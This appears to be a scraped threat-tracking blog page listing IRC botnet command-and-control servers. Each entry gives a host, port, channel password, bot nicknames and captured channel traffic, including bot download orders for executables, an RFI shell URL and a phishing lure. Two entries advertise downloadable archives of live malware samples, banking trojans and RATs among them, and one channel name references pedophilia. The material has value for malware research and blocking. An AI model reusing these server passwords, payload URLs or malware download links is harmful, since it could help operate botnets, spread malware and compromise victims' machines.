Remote Host Port Number 209.172.59.146 5794 PASS ngrBot 213.251.170.52 80 74.53.197.4 80 NICK n{US|XPa}pvcbajf USER pvcbajf 0 0 :pvcbajf JOIN #butowski ngrBot PRIVMSG #butowski :[DNS]: Blocked 0 domain(s) – Redirected 15 domain(s) The data identified by the following URLs was then requested from the remote web server: http://api.wipmania.com/ http://conectaamor.com/_server/editor/images/dominios.txt EXE File: http://conectaamor.com/_server/editor/images/fudnew2.exe RFI SHELL: http://conectaamor.com/_server/editor/images/lang.phpRead more...
irc.raidzone.net(irc botnet hosted in United States Lansing Liquid Web Inc)
50.28.21.18:8890 Nick: New|AUT|1244036|XP Username: 7665336 Joined Channel: #pedophiliac with Password YDARIO Remote Host Port Number 50.28.21.18 7659 PASS fuck NICK [3151|USA|XP|Z3R0x] USER 3151 “” “lol” :3151 JOIN #pedophiliac YDARIO PONG 422 hosting infos: http://whois.domaintools.com/50.28.21.18
42mb malware samples
This package have alot of rats and banking trojans inside have fun Download: http://c3266cfc.tubeviral.com
115.239.230.73(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)
Remote Host Port Number 115.239.230.73 6943 PASS laorosr 213.251.170.52 80 31.184.237.43 80 98.126.35.112 80 MODE [N00_USA_XP_1295223] @ -ix 00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR 00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X 00000020 | 505F 3132 3935 BCB9 4020 3A20 5261 6E64 |Read more...
92.241.165.115(irc botnet hosted in Russian Federation Oao Webalta)
Remote Host Port Number 213.251.170.52 80 92.241.165.115 1863 PASS ngrBot NICK n{US|XPa}qgaqcrq USER qgaqcrq 0 0 :qgaqcrq JOIN #start romeo Now talking in #start Topic On: [ #start ] [ *mdns http://www.abbygamerz.net/foro/index *msn.int 5 *msn.set viste las fotos nuevas de mi facebook? http://adf.ly/1gYW7 ] Topic By: [ ecu ] hosting infos: http://whois.domaintools.com/92.241.164.67
c0re.su(irc botnet hosted in Russian Federation Mir Telematiki Ltd)
Remote Host Port Number c0re.su 4443 NICK N[USA|XP][yiowryo] USER yiow “” “lol” :yiow JOIN #b0ts NICK N[USA|XP][uuobuyk] USER uuob “” “lol” :uuob NICK [USA-XP][ftlizjn] USER 2844 “” “TsGh” :2844 JOIN #botz NICK [USA-XP][qirnfam] USER 9143 “” “TsGh” :9143 NICK [n][USA-XP][ihcnykp] USER 2550 “” “TsGh” :2550 hosting infos: http://whois.domaintools.com/46.17.100.229
91.215.159.137(irc botnet hosted in Netherlands Amsterdam Infinite Technologies Internet Solutions Limited)
Remote Host Port Number 112.78.8.20 80 195.122.131.3 80 213.251.170.52 80 91.215.159.137 1866 PASS ngrBot PRIVMSG #!hot! :[DNS]: Blocked 1259 domain(s) – Redirected 0 domain(s) PRIVMSG #!hot! :[d=”http://rapidshare.com/files/2997295683/nap.exe”] Error downloading file [e=”12039″] NICK n{US|XPa}aytockz USER aytockz 0 0 :aytockz JOIN #!hot! ngrBot PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to “5” PRIVMSG #!hot! :[HTTP]: Updated HTTPRead more...
193.107.16.111(irc botnet hosted in Seychelles Ideal Solution Ltd)
Remote Host Port Number 193.107.16.111 7654 PASS ngrBot 213.251.170.52 80 66.45.255.234 80 NICK n{US|XPa}cucqohu USER cucqohu 0 0 :cucqohu JOIN #oldgold noKIDs PRIVMSG #oldgold :[d=”http://gloimpsa.com/js/expressInstall.swf.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataFdxaxf.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/193.107.16.111
tinker.weedns.com(irc botnet Mouse’s net again)
Remote Host Port Number tinker.weedns.com 3305 PASS secretpass Resolved : [tinker.weedns.com] To [173.9.72.212] Resolved : [tinker.weedns.com] To [222.124.178.155] Resolved : [tinker.weedns.com] To [66.238.151.86] Resolved : [tinker.weedns.com] To [188.165.200.48] Resolved : [tinker.weedns.com] To [74.210.208.163] NICK yf69xrls6 USER rb6c2qqku * 0 :USA|XP|115 JOIN #mm RSA Topic On: [ #mm ] [ +yOfS7/ZgRdB.u97R71RybXB/ubyOC/gLWja.029Cg1ae4NB/TcaF4.m9cnf/dRE2M0IU0Az0JjgIw/Pu691.6bET91ANj0U. ]
22mb malware samples
size 22mb diferent malware samples inside have fun reversing Download: http://8efc580b.tubeviral.com